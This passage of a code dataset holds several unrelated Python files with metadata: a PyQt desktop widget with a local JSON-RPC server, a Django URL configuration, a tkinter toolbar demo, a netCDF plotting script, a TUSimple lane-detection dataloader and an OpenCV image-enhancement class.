ev):\n        super().mouseMoveEvent(ev)\n        if hasattr(self, 'dragAnchor'):\n            self.move(ev.globalPos() - self.dragAnchor)\n\n    def mouseReleaseEvent(self, ev):\n        super().mouseReleaseEvent(ev)\n        if hasattr(self, 'dragAnchor'):\n            del self.dragAnchor\n            self.landOnScreen()\n\n    def mouseDoubleClickEvent(self, ev):\n        super().mouseDoubleClickEvent(ev)\n        self.close()\n\n    def about(self):\n        QMessageBox.about(self, \"About This\", \"
hello world
\")\n\n def createActions(self):\n self.exitAct = QAction(\"E&xit\", self, triggered=self.close)\n\n self.aboutAct = QAction(\"&About\", self, triggered=self.about)\n self.aboutQtAct = QAction(\"About &Qt\", self,\n triggered=QApplication.instance().aboutQt)\n\n def createMenus(self):\n self.fileMenu = QMenu(\"&File\", self)\n self.fileMenu.addAction(self.exitAct)\n\n self.viewMenu = QMenu(\"&View\", self)\n\n self.helpMenu = QMenu(\"&Help\", self)\n self.helpMenu.addAction(self.aboutAct)\n self.helpMenu.addAction(self.aboutQtAct)\n\n self.menuBar().addMenu(self.fileMenu)\n self.menuBar().addMenu(self.viewMenu)\n self.menuBar().addMenu(self.helpMenu)\n\n\nclass Balloon(QMainWindow):\n def __init__(self, text, point=None, parent=None):\n super().__init__()\n\n self.setWindowOpacity(0.9)\n self.setWindowFlags(self.windowFlags() | Qt.FramelessWindowHint)\n self.setWindowFlags(self.windowFlags() | Qt.WindowStaysOnTopHint)\n\n self.label = QLabel(text)\n self.setCentralWidget(self.label)\n\n if parent is not None:\n pass\n if point is not None:\n self.move(point)\n\n def mouseReleaseEvent(self, ev):\n super().mouseReleaseEvent(ev)\n self.close()\n\nclass RpcServer(object):\n def __init__(self, host, port, dispatcher=None):\n if dispatcher is None:\n dispatcher = jsonrpc.Dispatcher()\n self.dispatcher = dispatcher\n self.clients = []\n self.loop = pyuv.Loop.default_loop()\n self.server = pyuv.TCP(self.loop)\n self.server.bind((host, port))\n self.server.listen(self.forward_jsonrpc)\n self.jsonrpc = jsonrpc.JSONRPCResponseManager()\n\n self.dispatcher['register_listen'] = self.register_listen\n self.dispatcher['listen'] = self.listen\n self.listeners = []\n\n def register_listen(self, tcp_handler):\n self.listeners.append(tcp_handler)\n\n def listen(self, message):\n req = json.dumps({\n 'jsonrpc': 2.0,\n 'method': 'listen',\n 'params': [message],\n })\n for x in list(self.listeners):\n try:\n x.write(req.encode() + b'\\n')\n except pyuv.error.HandleError:\n self.listeners.remove(x)\n\n def forward_jsonrpc(self, server, error):\n client = pyuv.TCP(server.loop)\n server.accept(client)\n self.clients.append(client)\n client.start_read(self.talk_jsonrpc)\n\n def talk_jsonrpc(self, client, data, error):\n if data is None:\n client.close()\n self.clients.remove(client)\n return\n if not hasattr(client, 'dispatcher'):\n client.dispatcher = jsonrpc.Dispatcher()\n for key,elem in self.dispatcher.method_map.items():\n sig = inspect.signature(elem)\n try:\n sig.bind_partial(tcp_handler=client)\n except TypeError:\n pass\n else:\n elem = functools.partial(elem, tcp_handler=client)\n client.dispatcher[key] = elem\n response = self.jsonrpc.handle(data.decode(), client.dispatcher)\n if response is not None: # == notification (no id)\n client.write(response.json.encode().rstrip() + b'\\n')\n\n\nif __name__ == '__main__':\n import argparse\n import traceback\n parser = argparse.ArgumentParser()\n parser.add_argument('file')\n parser.add_argument('--name', default=sys.argv[0])\n parser.add_argument('--left', const='left', action='store_const', dest='position')\n parser.add_argument('--right', const='right', action='store_const', dest='position')\n parser.add_argument('--center', const='center', action='store_const', dest='position')\n parser.add_argument('--auto', const=None, action='store_const', dest='position')\n parser.add_argument('--opacity', type=float)\n parser.add_argument('--title-bar', action='store_true')\n parser.add_argument('--always-on-top', action='store_true', default=True)\n 
parser.add_argument('--host', default='127.0.0.1')\n parser.add_argument('--port', default=9802, type=int, help='default: 9802')\n args, unknown_args = parser.parse_known_args()\n\n app = QApplication(unknown_args)\n\n # The default sys.excepthook blocks things. But I want to use ^C instead of kill(1).\n def excepthook(type, value, tb):\n traceback.print_exception(type, value, tb)\n app.exit(1)\n sys.excepthook = excepthook\n\n ghost = Ghost(\n use_title_bar=args.title_bar,\n always_on_top=args.always_on_top,\n name=args.name,\n opacity=args.opacity)\n ghost.loadImage(args.file)\n if args.position is not None:\n ghost.moveByName(args.position)\n\n server = RpcServer(args.host, args.port)\n server.dispatcher['speak'] = ghost.speak\n\n timer = QTimer();\n timer.timeout.connect(lambda: server.loop.run(pyuv.UV_RUN_NOWAIT))\n timer.start(100)\n\n ghost.show()\n sys.exit(app.exec())\n", "sub_path": "interface.py", "file_name": "interface.py", "file_ext": "py", "file_size_in_byte": 9674, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 18, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.WA_NoSystemBackground", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.WA_TranslucentBackground", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.FramelessWindowHint", "line_number": 28, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.WindowStaysOnTopHint", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 51, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.MaskInColor", "line_number": 52, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 52, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 84, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QVector2D", "line_number": 93, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 94, "usage_type": "call"}, {"api_name": "random.gauss", "line_number": 95, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 95, "usage_type": "attribute"}, {"api_name": "random.uniform", 
"line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 97, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 97, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 97, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 103, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 135, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 135, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 140, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 141, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.instance", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 142, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 145, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 148, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 150, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 159, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.FramelessWindowHint", "line_number": 164, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 164, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.WindowStaysOnTopHint", "line_number": 165, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 165, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "jsonrpc.Dispatcher", "line_number": 182, "usage_type": "call"}, {"api_name": "pyuv.Loop.default_loop", "line_number": 185, "usage_type": "call"}, {"api_name": "pyuv.Loop", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pyuv.TCP", "line_number": 186, "usage_type": "call"}, {"api_name": "jsonrpc.JSONRPCResponseManager", "line_number": 189, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 199, "usage_type": "call"}, {"api_name": "pyuv.error", "line_number": 207, "usage_type": "attribute"}, {"api_name": "pyuv.TCP", "line_number": 211, "usage_type": "call"}, {"api_name": "jsonrpc.Dispatcher", "line_number": 222, "usage_type": "call"}, {"api_name": "inspect.signature", "line_number": 224, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 230, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 240, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 242, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 254, "usage_type": "call"}, {"api_name": "traceback.print_exception", "line_number": 258, "usage_type": "call"}, {"api_name": "sys.excepthook", "line_number": 260, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 274, "usage_type": "call"}, {"api_name": "pyuv.UV_RUN_NOWAIT", "line_number": 275, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 279, "usage_type": "call"}]} +{"seq_id": "377845228", "text": "from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^fill/$', views.fill, name='fill'),\n url(r'^clear/$', views.clear, name='clear'),\n url(r'^country/(?P[\\w-]+)/$', views.country, name='country'),\n url(r'^city/(?P[\\w-]+)/$', views.city, name='city'),\n url(r'^airport/(?P[\\w-]+)/$', views.airport, name='airport'),\n]\n", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 439, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "193694498", "text": "from tkinter import *\nfrom PIL import Image,ImageTk\n\nclass TkInterEx:\n\n @staticmethod\n def quit_app(event=None):\n root.quit()\n\n def on_fav_food_select(self,event=None):\n lb_widget = event.widget\n index = int(lb_widget.curselection()[0])\n lb_value = lb_widget.get(index)\n\n self.fav_food_label['text']=\"I'll get you \"+lb_value\n\n\n\n def __init__(self,root):\n root.title(\"Toolbar Example\")\n\n\n menubar = Menu(root)\n\n file_menu = Menu(root,tearoff=0)\n\n file_menu.add_command(label=\"open\")\n file_menu.add_command(label=\"save\")\n file_menu.add_command(label=\"quit\",command=self.quit_app)\n\n menubar.add_cascade(label=\"file\",menu=file_menu)\n\n # toolbar\n toolbar = Frame(root,bd=1,relief=RAISED)\n\n open_img = Image.open('open.png')\n save_img = Image.open('save.png')\n exit_img = Image.open('exit.png')\n\n open_icon = ImageTk.PhotoImage(open_img)\n save_icon = ImageTk.PhotoImage(save_img)\n exit_icon = ImageTk.PhotoImage(exit_img)\n\n open_button = Button(toolbar,image=open_icon)\n save_button = Button(toolbar,image=save_icon)\n exit_button = Button(toolbar,image=exit_icon,command=self.quit_app)\n\n open_button.image = open_icon\n save_button.image = save_icon\n exit_button.image = exit_icon\n\n open_button.pack(side=LEFT,padx=2,pady=2)\n save_button.pack(side=LEFT,padx=2,pady=2)\n exit_button.pack(side=LEFT,padx=2,pady=2)\n\n toolbar.pack(side=TOP,fill=X)\n root.config(menu=menubar)\n\n \n\nroot = Tk()\nroot.geometry('600x550')\napp = TkInterEx(root)\nroot.mainloop()\n", "sub_path": "toolbar.py", "file_name": "toolbar.py", "file_ext": "py", "file_size_in_byte": 1678, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 37, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 40, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 40, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 41, "usage_type": "name"}, {"api_name": 
"PIL.ImageTk.PhotoImage", "line_number": 42, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "97709515", "text": "from netCDF4 import Dataset\nimport numpy as np\n#import pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\n\n\n\n# in batch mode, without display\n#matplotlib.use('Agg') \n\nfile = 'netcdf/OS_PIRATA-FR29_TSG.nc'\nncpath = '.'\npath = 'plots'\n\nncfile = os.path.join(ncpath, file)\nnc = Dataset(ncfile, mode='r')\n\nSSPS = nc.variables['SSPS']\nSSTP = nc.variables['SSTP']\nTIME = nc.variables['TIME']\nLATITUDE = nc.variables['LATITUDE']\nLONGITUDE = nc.variables['LONGITUDE']\nCM = nc.cycle_mesure\n\n# move subplot outside loop prevent: RuntimeWarning: More than 20 figures have been opened.\n\nfig, ax = plt.subplots(2, 1, figsize=(6, 12))\nfig.subplots_adjust(left=0.125, bottom=0.1, right=0.9, top=0.9, wspace=0.3, hspace=0.3)\n\nim1 = ax[0].scatter(LONGITUDE[:], LATITUDE[:], c=SSPS[:], s=30, cmap='jet', vmin=32, vmax=37)\nfig.colorbar(im1, ax=ax[0], orientation='vertical')\nax[0].set(xlabel='{} '.format(LONGITUDE.standard_name), ylabel='{} '.format(LATITUDE.standard_name),\n title='{} - {}'.format(CM, SSPS.long_name))\nax[0].grid()\n\nim2 = ax[1].scatter(LONGITUDE[:], LATITUDE[:], c=SSTP[:], s=30, cmap='jet', vmin=21, vmax=32)\nfig.colorbar(im2, ax=ax[1], orientation='vertical')\nax[1].set(xlabel='{} '.format(LONGITUDE.standard_name), ylabel='{} '.format(LATITUDE.standard_name),\n title='{} - {}'.format(CM, SSPS.long_name))\nax[1].grid()\n\nfigname = '{}_TSG_COLCOR_SCATTER.png'.format(CM)\ndest = os.path.join(path, figname)\nfig.savefig(dest)\nprint('Printing: ', dest)\n\nplt.show()\nplt.cla()\n\n#im1 = cs[0, 0].contourf(lon,lat,result1, np.linspace(20,30,21), extend='both', cmap=cm.jet)\n#cs[0, 0].set_title('VOTEMPER OBS Saison ' + list1[x],fontsize=10)\n#fig.colorbar(im1, ax=cs[0, 0], orientation='horizontal')\n\n######################################df = pd.DataFrame(np.transpose([LONGITUDE[:], LATITUDE[:], SSPS[:]]), columns=['LONGITUDE', 'LATITUDE', 'SSPS']) #, columns=['Longitudes','Latitudes']\n######################################ax = df.plot.scatter(x='LONGITUDE', y='LATITUDE', c='SSPS', colormap='viridis')\n######################################ax.set_ylim(bottom=-12,top=19)\n######################################ax.set_xlim(left=-30, right=15)\n######################################print(df)\n\n#A = np.array((LONGITUDE, LATITUDE, SSTP), dtype=float)\n#print(SSPS[36])\n#print(A)\n#plt.plot(LATITUDE,LONGITUDE,A)\n", "sub_path": "stage/plot_scatter_tsg.py", "file_name": "plot_scatter_tsg.py", "file_ext": "py", "file_size_in_byte": 2341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "netCDF4.Dataset", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 50, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "10385535", "text": "from torch.utils.data import Dataset, DataLoader\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport warnings\nimport os,json\nimport numpy as np\nimport cv2\nfrom scipy.ndimage.morphology import grey_dilation\nfrom scipy.interpolate import CubicSpline\n#from utils.util import *\nfrom skimage import filters\n\nwarnings.filterwarnings(\"ignore\")\n\nclass TUSimple(Dataset):\n def __init__(self, path):\n self.path = path\n self.LINE_SIZE = 30\n sub = [i for i in os.listdir(self.path) if i!=\".DS_Store\"]\n labels = [self.path + \"/\" + i for i in sub if i[-4:]==\"json\"]\n images_root_path = self.path + \"/clips\"\n images = list()\n self.labels = dict()\n images_folders = [self.path+\"/clips/\"+i for i in os.listdir(images_root_path) if i!=\".DS_Store\"]\n for imgs_folder in images_folders:\n for i in os.listdir(imgs_folder):\n if(\"DS\" in i):\n continue\n\n tmp_path = imgs_folder + \"/\" +i\n lst_of_imgs = [imgs_folder + \"/\" + i+\"/\"+j for j in os.listdir(tmp_path) if j==\"20.jpg\"]\n images += lst_of_imgs\n\n self.images = images\n for label_path in labels:\n with open(label_path,\"r\") as f:\n for i in f.readlines():\n todict = json.loads(i[:-1])\n label_img_name = todict['raw_file']\n self.labels[label_img_name] = todict\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n image_path = self.images[idx]\n key_ind = image_path.split(\"/\").index(\"clips\")\n key_path = os.path.join( *image_path.split(\"/\")[key_ind:])\n abs_path = self.path +\"/\"+os.path.join( *image_path.split(\"/\")[key_ind:])\n\n label = self.labels[key_path]\n lanes_w = np.array(label['lanes'])\n lanes_h = np.array(label['h_samples'])\n lane_cnt = lanes_w.shape[0]\n\n image = plt.imread(image_path) #(720, 1280, 3)\n image=np.pad(image, ((8,8), (0,0), (0, 0)), 'constant')\n image = cv2.resize(image, dsize=(640,368), interpolation=cv2.INTER_AREA)\n hmap = np.zeros(image.shape[:2])\n\n lane_pair = list()\n point = 0\n for i in range(lane_cnt):\n mask = (lanes_w[i,:] * lanes_h) > 0\n xs = (lanes_w[i,:][mask]-8) /1280. * 640.\n ys = lanes_h[mask] /728. 
* 368.\n ys = np.clip(ys, 0, 367)\n for j in range(xs.shape[0]):\n try:\n hmap[int(ys[j]), int(xs[j])] = 1\n except:\n print(ys)\n print(xs)\n if(j < xs.shape[0]-1):\n cv2.line(hmap, (int(xs[j]), int(ys[j])), (int(xs[j+1]), int(ys[j+1])), i+1, self.LINE_SIZE)\n\n binary = np.where(hmap>0, 1, 0)\n instance = hmap\n\n show = False\n if show:\n plt.subplot(4,1,1)\n plt.imshow(image)\n plt.subplot(4,1,2)\n plt.imshow(image)\n plt.imshow(hmap, alpha=0.5)\n plt.subplot(4,1,3)\n plt.imshow(instance)\n plt.subplot(4,1,4)\n plt.imshow(binary)\n plt.show()\n\n return image, binary, instance\n\nif __name__=="__main__":\n import random\n random.seed(a=None)\n dataset = TUSimple("/home/yo0n/바탕화면/TUsimple")\n o = dataset[random.randint(0,len(dataset)-1)]\n print(o[0].shape, o[1].shape, o[2].shape) # (368, 640, 3) (368, 640) (368, 640)\n\n lanes = int(o[2].max())\n plt.subplot(lanes+2,1,1)\n plt.imshow(o[0])\n plt.subplot(lanes+2,1,2)\n plt.imshow(o[2])\n for i in range(lanes):\n plt.subplot(lanes+2,1,i+3)\n plt.imshow(o[2]==(i+1))\n plt.show()\n", "sub_path": "dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 3859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "warnings.filterwarnings", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 15, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 31, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imread", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 
89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 99, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}]} +{"seq_id": "538095827", "text": "from cv2 import cv2 as cv\nimport math\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport os\nimport re\n\nclass Image(object):\n def __init__(self, root):\n self.root = root\n self.data = cv.imread(root)\n \n def img_show(self, title, img, label=None):\n cv.imshow(title, img)\n cv.waitKey(0)\n cv.destroyWindow(title)\n\n file_name = re.search('/(.*)bmp', self.root).group().replace('/', '_').replace('bmp', 'png')\n cv.imwrite('outputs/' + label + file_name, img)\n\n def invert(self):\n if self.data is not None:\n new_data = 255 - self.data\n result = np.hstack((self.data, new_data))\n self.img_show(\"Inversion\", result, 'inverted')\n\n def log_trans(self, c):\n # s = c * log(1 + r)\n if self.data is not None: \n new_data = np.zeros_like(self.data)\n\n rows = self.data.shape[0]\n cols = self.data.shape[1]\n \n for i in range(rows):\n for j in range(cols):\n for k in range(3):\n new_data[i, j, k] = c * math.log(1.0 + self.data[i, j, k])\n\n cv.normalize(new_data, new_data, 0, 255, cv.NORM_MINMAX)\n new_data = cv.convertScaleAbs(new_data)\n\n result = np.hstack((self.data, new_data))\n\n self.img_show(\"Log_trans with c=\"+str(c), result, 'log-transfered')\n\n def exp_trans(self, c, gamma):\n # s = c * r ^ gamma\n if self.data is not None: \n new_data = np.zeros_like(self.data)\n\n rows = self.data.shape[0]\n cols = self.data.shape[1]\n \n for i in range(rows):\n for j in range(cols):\n for k in range(3):\n new_data[i, j, k] = c * math.pow(self.data[i, j, k], gamma)\n\n 
cv.normalize(new_data, new_data, 0, 255, cv.NORM_MINMAX)\n new_data = cv.convertScaleAbs(new_data)\n\n result = np.hstack((self.data, new_data))\n\n self.img_show(\"Exp_trans with c=\"+str(c)+\" gamma=\"+str(gamma), result, 'exp-transfered')\n \n def neighbor(self):\n data_3x3 = cv.blur(self.data, (3, 3))\n data_7x7 = cv.blur(self.data, (7, 7))\n result = np.hstack((self.data, data_3x3, data_7x7))\n self.img_show('neighbor averaging 3x3 and 7x7', result, 'neighbor-averaged')\n\n\n def median(self):\n data_3x3 = cv.medianBlur(self.data, 3)\n result = np.hstack((self.data, data_3x3))\n self.img_show(\"median averaging\", result, \"median-averaged\")\n\n def sharpen(self):\n new_data = cv.Laplacian(self.data, cv.CV_16S, ksize=3)\n new_data = cv.convertScaleAbs(new_data)\n result = np.hstack((self.data, new_data))\n self.img_show(\"sharpen\", result, 'sharpened')\n \n def hist_equalization(self):\n colors=('b', 'g', 'r')\n\n (b, g, r) = cv.split(self.data)\n\n plt.figure()\n b_e = cv.equalizeHist(b)\n g_e = cv.equalizeHist(g)\n r_e = cv.equalizeHist(r)\n\n plt.subplot(1, 2, 1)\n plt.plot(b[0], colors[0])\n plt.plot(g[0], colors[1])\n plt.plot(r[0], colors[2])\n\n plt.subplot(1, 2, 2)\n plt.plot(b_e[0], colors[0])\n plt.plot(g_e[0], colors[1])\n plt.plot(r_e[0], colors[2])\n \n file_name = re.search('/(.*)bmp', self.root).group().replace('/', '_').replace('bmp', 'png')\n plt.savefig('outputs/' + 'histogram-of-' + file_name)\n plt.show()\n \n src = cv.merge((b, g, r))\n dst = cv.merge((b_e, g_e, r_e))\n\n result = np.hstack((src, dst))\n self.img_show(\"Hist_equalization\", result, \"hist-equalized\")\n\n \nif __name__ == \"__main__\":\n imgs = []\n for file in os.listdir('img/'):\n imgs.append(Image('img/'+file))\n \n # imgs[15].invert()\n # imgs[6].log_trans(2)\n imgs[1].exp_trans(2, 2)\n imgs[1].exp_trans(2, 0.5)\n # imgs[13].neighbor()\n # imgs[4].median()\n # imgs[24].sharpen()\n imgs[25].hist_equalization()\n\n\n ", "sub_path": "imgEnhancement.py", "file_name": "imgEnhancement.py", "file_ext": "py", "file_size_in_byte": 4062, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": 